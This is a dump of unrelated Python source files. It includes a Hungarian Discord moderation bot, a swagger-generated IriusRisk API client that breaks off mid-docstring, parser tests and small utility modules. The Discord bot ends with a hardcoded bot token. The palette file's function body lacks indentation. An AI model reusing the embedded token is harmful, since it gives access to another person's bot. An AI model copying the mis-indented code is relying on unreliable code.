    username = ctx.message.author.name
    if not member:
        embed = discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    role = discord.utils.get(ctx.guild.roles, name="Figyelmeztettett")
    await member.add_roles(role)
    embed = discord.Embed(title="Scrappy | swarn", description="Sikeres Művelet", color=discord.Colour.red())
    embed.add_field(name="Felhasználó:", value=member)
    embed.add_field(name="Figyelmeztette:", value=username)
    embed.add_field(name="Büntetés:", value='Figyelmeztetett Rang')
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
@warn.error
async def warn_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed = discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( swarn )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
@unmute.error
async def unmute_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed = discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sunmute )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(send_messages=True)
async def broadcast(ctx, *, arg):
    # keyword-only `arg` captures the whole message text, not just the first word
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | Üzenet", description='▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬', color=discord.Colour.blue())
    embed.add_field(name="Üzenet:", value=arg)
    embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
    await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def setup(ctx):
    await ctx.message.delete()
    # `guild` was undefined here; the role must be created on the invoking guild
    await ctx.guild.create_role(name="Figyelmeztettett", color=discord.Colour.red())
@setup.error
async def setup_error(ctx, error):
    await ctx.message.delete()
    if isinstance(error, commands.CheckFailure):
        embed = discord.Embed(title="Hiba Történt.", description="❌ A Bot Feltelepitéséhez Adminisztrációs Jog Szükséges!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
@bot.command()
async def help(ctx):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | shelp", description="Jelenleg elérhető parancsok:", color=discord.Colour.blue())
    embed.add_field(name="Bot Feltelepitése:", value="ssetup", inline=False)
    embed.add_field(name="A Bot Prefixe:", value="s", inline=False)
    embed.add_field(name="Alap Parancsok:", value="info, help, broadcast <Üzenet>, clear <mennyiség>", inline=False)
    embed.add_field(name="Fun Parancsok:", value="srnumber,", inline=False)
    embed.add_field(name="Zene Parancsok:", value="Hamarosan", inline=False)
    embed.add_field(name="Moderációs Parancsok:", value="ban, kick, warn, mute, unmute", inline=False)
    embed.add_field(name="WARN:", value="Feltelepitésnél Scrappy Létrehoz egy ( Figyelmeztettett ) Rangot, Ezt a rangot tetszőlegesen állithatod be, akár egy két jog elvonásával ( ugye ezzel adva értelmet a rangnak )", inline=False)
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(manage_messages=True)
async def clear(ctx, amount: int = 100):
    await ctx.message.delete()
    # channel.purge avoids the 100-message / 14-day limits that make
    # delete_messages() fail on larger histories
    await ctx.channel.purge(limit=amount)
    embed = discord.Embed(title="Scrappy | sclear", description="✅ Üzenetek törölve.", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
@clear.error
async def clear_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed = discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sclear )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
@bot.command()
async def info(ctx):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | sinfo", description="[📌] Információk", color=discord.Colour.green())
    embed.add_field(name="Készitő:", value="Getdown")
    embed.add_field(name="Készités Dátuma:", value="2020.03.16")
    embed.add_field(name="Programnyelv:", value="Python")
    embed.add_field(name="Szerverek", value=f"{len(bot.guilds)}")
    embed.add_field(name="Elérhetőség", value="GETDOWN#5271")
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
bot.run("Njg5NDY1MjEwNTgyNTk3NzAx.XnMxgw.szJh3vby9mJYi0Q41syFq6Iiuo8")

# ==== app/http/v1/handlers/default.py (repo: nkthanh98/flask-openapi, license: MIT) ====
# coding=utf-8
from connexion import NoContent
def ping():
    return NoContent

# ==== pytorch_lightning/utilities/warning_utils.py (repo: KyleGoyette/pytorch-lightning, license: Apache-2.0) ====
from pytorch_lightning.utilities import rank_zero_deprecation
rank_zero_deprecation("`warning_utils` package has been renamed to `warnings` since v1.2 and will be removed in v1.4")
from pytorch_lightning.utilities.warnings import * # noqa: F403 E402 F401

# ==== image_similarity/__init__.py (repo: JonathanSum/image_similarity, license: MIT) ====
from torch_engine import *
from torch_model import *
from torch_data import *
from torch_train import *
from torch_infer import *
from utils import *

# ==== experiment_scripts/1-16-2021/tsne.py (repo: alexlioralexli/TD3, license: MIT) ====
envs = ['Ant-v3', 'HalfCheetah-v3', 'Hopper-v2', 'Walker2d-v2']
env_folders = [
    ['/home/pathak-visitor1/workspace/TD3/logs/Ant-v3-td3-01-14-2021/Ant-v3-td3-FourierMLP-exp16-01-14-2021_18-21-19-563065',
     '/home/pathak-visitor1/workspace/TD3/logs/Ant-v3-td3-01-14-2021/Ant-v3-td3-MLP-exp16-01-14-2021_18-20-58-515211'],
    ['/home/pathak-visitor1/workspace/TD3/logs/HalfCheetah-v3-td3-01-14-2021/HalfCheetah-v3-td3-FourierMLP-exp16-01-14-2021_18-21-19-959718',
     '/home/pathak-visitor1/workspace/TD3/logs/HalfCheetah-v3-td3-01-14-2021/HalfCheetah-v3-td3-MLP-exp16-01-14-2021_18-20-58-517651'],
    ['/home/pathak-visitor1/workspace/TD3/logs/Hopper-v2-td3-01-14-2021/Hopper-v2-td3-FourierMLP-exp16-01-14-2021_18-21-19-915820',
     '/home/pathak-visitor1/workspace/TD3/logs/Hopper-v2-td3-01-14-2021/Hopper-v2-td3-MLP-exp16-01-14-2021_18-20-58-889674'],
    ['/home/pathak-visitor1/workspace/TD3/logs/Walker2d-v2-td3-01-14-2021/Walker2d-v2-td3-FourierMLP-exp16-01-14-2021_18-21-19-565278',
     '/home/pathak-visitor1/workspace/TD3/logs/Walker2d-v2-td3-01-14-2021/Walker2d-v2-td3-MLP-exp16-01-14-2021_18-20-58-732887']]
files = ['itr250000', 'final']
expl_noises = [0, 0.1]
for i, env in enumerate(envs):
    for folder in env_folders[i]:
        for file in files:
            for expl_noise in expl_noises:
                print(f'python make_state_tsne.py --env {env} --n_timesteps 25000 --expl_noise {expl_noise} --load_model {folder + "/" + file}')

# ==== geneticpython/models/tree/__init__.py (repo: ngocjr7/geneticpython, license: MIT) ====
from __future__ import absolute_import
from geneticpython.models.tree.network_random_keys import NetworkRandomKeys
from geneticpython.models.tree.prufer_code import PruferCode
from geneticpython.models.tree.edge_sets import EdgeSets
from geneticpython.models.tree.tree import Tree, KruskalTree, LinkCutTree, RootedTree

# ==== tests/test_parser.py (repo: rominf/cleo, license: MIT) ====
# -*- coding: utf-8 -*-
from cleo.parser import Parser
from cleo.validators import Integer, Boolean
from . import CleoTestCase
class ParserTestCase(CleoTestCase):
    def test_basic_parameter_parsing(self):
        results = Parser.parse('command:name')
        self.assertEqual('command:name', results['name'])

        results = Parser.parse('command:name {argument} {--option}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('argument', results['arguments'][0].get_name())
        self.assertEqual('option', results['options'][0].get_name())
        self.assertFalse(results['options'][0].accept_value())

        results = Parser.parse('command:name {argument*} {--option=}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('argument', results['arguments'][0].get_name())
        self.assertTrue(results['arguments'][0].is_list())
        self.assertTrue(results['arguments'][0].is_required())
        self.assertEqual('option', results['options'][0].get_name())
        self.assertTrue(results['options'][0].accept_value())

        results = Parser.parse('command:name {argument?*} {--option=*}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('argument', results['arguments'][0].get_name())
        self.assertTrue(results['arguments'][0].is_list())
        self.assertFalse(results['arguments'][0].is_required())
        self.assertEqual('option', results['options'][0].get_name())
        self.assertTrue(results['options'][0].accept_value())
        self.assertTrue(results['options'][0].is_list())

        results = Parser.parse('command:name {argument?* : The argument description.} {--option=* : The option description.}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('argument', results['arguments'][0].get_name())
        self.assertEqual('The argument description.', results['arguments'][0].get_description())
        self.assertTrue(results['arguments'][0].is_list())
        self.assertFalse(results['arguments'][0].is_required())
        self.assertEqual('option', results['options'][0].get_name())
        self.assertEqual('The option description.', results['options'][0].get_description())
        self.assertTrue(results['options'][0].accept_value())
        self.assertTrue(results['options'][0].is_list())

        results = Parser.parse(
            'command:name '
            '{argument?* : The argument description.} '
            '{--option=* : The option description.}'
        )
        self.assertEqual('command:name', results['name'])
        self.assertEqual('argument', results['arguments'][0].get_name())
        self.assertEqual('The argument description.', results['arguments'][0].get_description())
        self.assertTrue(results['arguments'][0].is_list())
        self.assertFalse(results['arguments'][0].is_required())
        self.assertEqual('option', results['options'][0].get_name())
        self.assertEqual('The option description.', results['options'][0].get_description())
        self.assertTrue(results['options'][0].accept_value())
        self.assertTrue(results['options'][0].is_list())
    def test_shortcut_name_parsing(self):
        results = Parser.parse('command:name {--o|option}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('option', results['options'][0].get_name())
        self.assertEqual('o', results['options'][0].get_shortcut())
        self.assertFalse(results['options'][0].accept_value())

        results = Parser.parse('command:name {--o|option=}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('option', results['options'][0].get_name())
        self.assertEqual('o', results['options'][0].get_shortcut())
        self.assertTrue(results['options'][0].accept_value())

        results = Parser.parse('command:name {--o|option=*}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('option', results['options'][0].get_name())
        self.assertEqual('o', results['options'][0].get_shortcut())
        self.assertTrue(results['options'][0].accept_value())
        self.assertTrue(results['options'][0].is_list())

        results = Parser.parse('command:name {--o|option=* : The option description.}')
        self.assertEqual('command:name', results['name'])
        self.assertEqual('option', results['options'][0].get_name())
        self.assertEqual('o', results['options'][0].get_shortcut())
        self.assertEqual('The option description.', results['options'][0].get_description())
        self.assertTrue(results['options'][0].accept_value())
        self.assertTrue(results['options'][0].is_list())

        results = Parser.parse(
            'command:name '
            '{--o|option=* : The option description.}'
        )
        self.assertEqual('command:name', results['name'])
        self.assertEqual('option', results['options'][0].get_name())
        self.assertEqual('o', results['options'][0].get_shortcut())
        self.assertEqual('The option description.', results['options'][0].get_description())
        self.assertTrue(results['options'][0].accept_value())
        self.assertTrue(results['options'][0].is_list())
    def test_validator_parsing(self):
        results = Parser.parse('command:name {argument (integer)} {--option (boolean) : Description with (parenthesis)}')
        self.assertEqual('argument', results['arguments'][0].get_name())
        self.assertEqual('option', results['options'][0].get_name())
        self.assertIsInstance(results['arguments'][0].get_validator(), Integer)
        self.assertIsInstance(results['options'][0].get_validator(), Boolean)

# ==== falsecolor2.py (repo: surfline-jherndon/gifpal, license: MIT) ====
def palette():
type = "list"
palette = [255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 250, 0, 255, 250, 0, 255, 250, 0, 255, 250, 0, 255, 244, 0, 255, 244, 0, 255, 244, 0, 255, 244, 0, 255, 239, 0, 255, 239, 0, 255, 239, 0, 255, 239, 0, 255, 234, 0, 255, 234, 0, 255, 234, 0, 255, 228, 0, 255, 228, 0, 255, 223, 0, 255, 223, 0, 255, 223, 0, 255, 218, 0, 255, 218, 0, 255, 218, 0, 255, 218, 0, 255, 212, 0, 255, 212, 0, 255, 212, 0, 255, 212, 0, 255, 207, 0, 255, 207, 0, 255, 207, 0, 255, 207, 0, 255, 207, 0, 255, 201, 0, 255, 201, 0, 255, 201, 0, 255, 201, 0, 255, 196, 0, 255, 196, 0, 255, 196, 0, 255, 196, 0, 255, 196, 0, 255, 191, 0, 255, 191, 0, 255, 191, 0, 255, 191, 0, 255, 185, 0, 255, 185, 0, 255, 185, 0, 255, 185, 0, 255, 185, 0, 255, 180, 0, 255, 180, 0, 255, 180, 0, 255, 180, 0, 255, 175, 0, 255, 175, 0, 255, 175, 0, 255, 175, 0, 255, 175, 0, 255, 170, 0, 255, 170, 0, 255, 170, 0, 255, 170, 0, 255, 165, 0, 255, 165, 0, 255, 165, 0, 255, 165, 0, 255, 165, 0, 255, 160, 0, 255, 160, 0, 255, 160, 0, 255, 160, 0, 255, 155, 0, 255, 155, 0, 255, 155, 0, 255, 155, 0, 255, 155, 0, 255, 150, 0, 255, 150, 0, 255, 150, 0, 255, 150, 0, 255, 145, 0, 255, 145, 0, 255, 145, 0, 255, 145, 0, 255, 140, 0, 255, 140, 0, 255, 140, 0, 255, 140, 0, 255, 140, 0, 255, 135, 0, 255, 135, 0, 255, 135, 0, 255, 135, 0, 255, 130, 0, 255, 130, 0, 255, 130, 0, 255, 130, 0, 255, 130, 0, 255, 125, 0, 255, 125, 0, 255, 125, 0, 255, 125, 0, 255, 120, 0, 255, 120, 0, 255, 120, 0, 255, 120, 0, 255, 120, 0, 255, 115, 0, 255, 115, 0, 255, 115, 0, 255, 115, 0, 255, 110, 0, 255, 110, 0, 255, 110, 0, 255, 110, 0, 255, 110, 0, 255, 105, 0, 255, 105, 0, 255, 105, 0, 255, 105, 0, 255, 100, 0, 255, 100, 0, 255, 100, 0, 255, 100, 0, 255, 100, 0, 255, 95, 0, 255, 95, 0, 255, 95, 0, 255, 95, 0, 255, 90, 0, 255, 90, 0, 255, 90, 0, 255, 90, 0, 255, 90, 0, 255, 85, 0, 255, 85, 0, 255, 85, 0, 
255, 85, 0, 255, 80, 0, 255, 80, 0, 255, 80, 0, 255, 80, 0, 255, 80, 0, 255, 75, 0, 255, 75, 0, 255, 75, 0, 255, 75, 0, 255, 70, 0, 255, 70, 0, 255, 70, 0, 255, 70, 0, 255, 70, 0, 255, 65, 0, 255, 65, 0, 255, 65, 0, 255, 65, 0, 255, 60, 0, 255, 60, 0, 255, 60, 0, 255, 60, 0, 255, 60, 0, 255, 55, 0, 255, 55, 0, 255, 55, 0, 255, 55, 0, 255, 50, 0, 255, 50, 0, 255, 50, 0, 255, 50, 0, 255, 50, 0, 255, 45, 0, 255, 45, 0, 255, 45, 0, 255, 45, 0, 255, 40, 0, 255, 40, 0, 255, 40, 0, 255, 40, 0, 255, 40, 0, 255, 35, 0, 255, 35, 0, 255, 35, 0, 255, 35, 0, 255, 30, 0, 255, 30, 0, 255, 30, 0, 255, 30, 0, 255, 30, 0, 255, 25, 0, 255, 25, 0, 255, 25, 0, 255, 25, 0, 255, 20, 0, 255, 20, 0, 255, 20, 0, 255, 20, 0, 255, 20, 0, 255, 15, 0, 255, 15, 0, 255, 15, 0, 255, 15, 0, 255, 10, 0, 255, 10, 0, 255, 10, 0, 255, 10, 0, 255, 10, 0, 255, 5, 0, 255, 5, 0, 255, 5, 0, 255, 5, 0, 255, 0, 0, 255, 0, 0, 255, 0, 0, 255, 0, 0, 255, 0, 0, 255, 0, 5, 255, 0, 5, 255, 0, 5, 255, 0, 5, 255, 0, 10, 255, 0, 10, 255, 0, 10, 255, 0, 10, 255, 0, 10, 255, 0, 15, 255, 0, 15, 255, 0, 15, 255, 0, 15, 255, 0, 20, 255, 0, 20, 255, 0, 20, 255, 0, 20, 255, 0, 20, 255, 0, 25, 255, 0, 25, 255, 0, 25, 255, 0, 25, 255, 0, 30, 255, 0, 30, 255]
return type, palette

# ==== iriusrisk-python-client-lib/iriusrisk_python_client_lib/api/groups_api.py (repo: iriusrisk/iriusrisk-python-client-lib, license: Apache-2.0) ====
# coding: utf-8
"""
IriusRisk API
Products API # noqa: E501
OpenAPI spec version: 1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from iriusrisk_python_client_lib.api_client import ApiClient
class GroupsApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
    def groups_get(self, api_token, **kwargs):  # noqa: E501
        """Gets a list of all Groups  # noqa: E501

        Gets a list of all user's groups. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_get(api_token, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :return: list[Group]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_get_with_http_info(api_token, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_get_with_http_info(api_token, **kwargs)  # noqa: E501
            return data
    def groups_get_with_http_info(self, api_token, **kwargs):  # noqa: E501
        """Gets a list of all Groups  # noqa: E501

        Gets a list of all user's groups. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_get_with_http_info(api_token, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :return: list[Group]
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['api_token']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[Group]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def groups_group_ref_delete(self, api_token, group_ref, **kwargs):  # noqa: E501
        """Deletes a users group  # noqa: E501

        Deletes a users group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_ref_delete(api_token, group_ref, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group_ref: unique name of the group (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_group_ref_delete_with_http_info(api_token, group_ref, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_group_ref_delete_with_http_info(api_token, group_ref, **kwargs)  # noqa: E501
            return data
    def groups_group_ref_delete_with_http_info(self, api_token, group_ref, **kwargs):  # noqa: E501
        """Deletes a users group  # noqa: E501

        Deletes a users group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_ref_delete_with_http_info(api_token, group_ref, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group_ref: unique name of the group (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['api_token', 'group_ref']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_group_ref_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_group_ref_delete`")  # noqa: E501
        # verify the required parameter 'group_ref' is set
        if ('group_ref' not in params or
                params['group_ref'] is None):
            raise ValueError("Missing the required parameter `group_ref` when calling `groups_group_ref_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'group_ref' in params:
            path_params['groupRef'] = params['group_ref']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups/{groupRef}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def groups_group_ref_get(self, api_token, group_ref, **kwargs):  # noqa: E501
        """Gets the group details.  # noqa: E501

        Returns the group details for the requested group. Conditions to be able to perform the action: - If the caller has the PRODUCTS_LIST_ALL permission then all groups can be queried without restriction. - Without the PRODUCTS_LIST_ALL permission, the call will only return the group if the caller belongs to that group.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_ref_get(api_token, group_ref, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group_ref: unique name of the group (required)
        :return: list[Group]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_group_ref_get_with_http_info(api_token, group_ref, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_group_ref_get_with_http_info(api_token, group_ref, **kwargs)  # noqa: E501
            return data

    def groups_group_ref_get_with_http_info(self, api_token, group_ref, **kwargs):  # noqa: E501
        """Gets the group details.  # noqa: E501

        Returns the group details for the requested group. Conditions to be able to perform the action: - If the caller has the PRODUCTS_LIST_ALL permission then all groups can be queried without restriction. - Without the PRODUCTS_LIST_ALL permission, the call will only return the group if the caller belongs to that group.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_ref_get_with_http_info(api_token, group_ref, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group_ref: unique name of the group (required)
        :return: list[Group]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'group_ref']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_group_ref_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_group_ref_get`")  # noqa: E501
        # verify the required parameter 'group_ref' is set
        if ('group_ref' not in params or
                params['group_ref'] is None):
            raise ValueError("Missing the required parameter `group_ref` when calling `groups_group_ref_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'group_ref' in params:
            path_params['groupRef'] = params['group_ref']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups/{groupRef}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[Group]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def groups_group_ref_put(self, api_token, group_ref, update_group_request_body, **kwargs):  # noqa: E501
        """Updates a user group  # noqa: E501

        Updates a user group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_ref_put(api_token, group_ref, update_group_request_body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group_ref: unique ref of the group (required)
        :param UpdateGroupRequestBody update_group_request_body: JSON data containing the fields to update (required)
        :return: Group
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_group_ref_put_with_http_info(api_token, group_ref, update_group_request_body, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_group_ref_put_with_http_info(api_token, group_ref, update_group_request_body, **kwargs)  # noqa: E501
            return data

    def groups_group_ref_put_with_http_info(self, api_token, group_ref, update_group_request_body, **kwargs):  # noqa: E501
        """Updates a user group  # noqa: E501

        Updates a user group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_ref_put_with_http_info(api_token, group_ref, update_group_request_body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group_ref: unique ref of the group (required)
        :param UpdateGroupRequestBody update_group_request_body: JSON data containing the fields to update (required)
        :return: Group
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'group_ref', 'update_group_request_body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_group_ref_put" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_group_ref_put`")  # noqa: E501
        # verify the required parameter 'group_ref' is set
        if ('group_ref' not in params or
                params['group_ref'] is None):
            raise ValueError("Missing the required parameter `group_ref` when calling `groups_group_ref_put`")  # noqa: E501
        # verify the required parameter 'update_group_request_body' is set
        if ('update_group_request_body' not in params or
                params['update_group_request_body'] is None):
            raise ValueError("Missing the required parameter `update_group_request_body` when calling `groups_group_ref_put`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'group_ref' in params:
            path_params['groupRef'] = params['group_ref']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'update_group_request_body' in params:
            body_params = params['update_group_request_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups/{groupRef}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Group',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def groups_group_users_delete(self, api_token, group, unassing_users_group_request_body, **kwargs):  # noqa: E501
        """Unassigns a list of users from a group  # noqa: E501

